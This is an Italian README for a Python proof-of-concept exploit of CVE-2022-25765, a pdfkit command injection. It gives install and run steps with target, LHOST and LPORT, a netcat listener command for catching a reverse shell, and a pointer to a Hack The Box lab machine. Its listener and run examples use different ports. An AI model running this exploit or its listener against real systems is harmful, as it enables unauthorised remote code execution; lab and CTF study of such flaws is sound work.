
Proof-of-concept in Python per CVE-2022-25765, una vulnerabilità di command injection in pdfkit, che consente l'esecuzione remota di codice tramite la generazione di PDF appositamente predisposti.
PoC per CVE-2022-25765, che colpisce le versioni vulnerabili di pdfkit.
Testato con pdfkit 0.8.6.
requestscoloramaInstalla le dipendenze:
pip3 install -r requirements.txt
Oppure manualmente:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
Esempio: Avvia un listener
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
Clona il repository:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
Installa i requisiti:
pip3 install -r requirements.txt
Esegui il PoC contro il tuo target di laboratorio.
CVE-2022-25765 è una vulnerabilità di command injection nelle versioni vulnerabili di pdfkit.
Il problema è legato a una sanitizzazione insufficiente dell'input controllato dall'utente passato al processo di generazione PDF.
Questo PoC è stato creato principalmente per scopi di apprendimento e ambienti CTF/laboratorio.
Se stai cercando un posto dove provarlo, Hack The Box: Macchina: Precious.
Usalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test.
Non sono responsabile per usi impropri o danni causati da questo progetto.
INNOCENTx0